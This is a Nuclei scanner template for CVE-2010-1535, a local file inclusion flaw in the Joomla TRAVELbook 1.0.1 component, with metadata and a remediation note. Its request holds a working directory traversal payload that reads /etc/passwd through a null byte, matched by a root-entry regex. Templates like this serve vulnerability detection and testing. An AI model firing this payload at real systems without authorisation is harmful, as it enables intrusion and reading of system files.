nuclei-templates/http/cves/2010/CVE-2010-1535.yaml

42 lines
1.3 KiB
YAML

id: CVE-2010-1535
info:
name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: |
Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability.
reference:
- https://www.exploit-db.com/exploits/12151
- https://nvd.nist.gov/vuln/detail/CVE-2010-1535
- http://www.exploit-db.com/exploits/12151
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-1535
cwe-id: CWE-22
epss-score: 0.00706
epss-percentile: 0.77913
cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: peter_hocherl
product: com_travelbook
tags: cve,cve2010,joomla,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200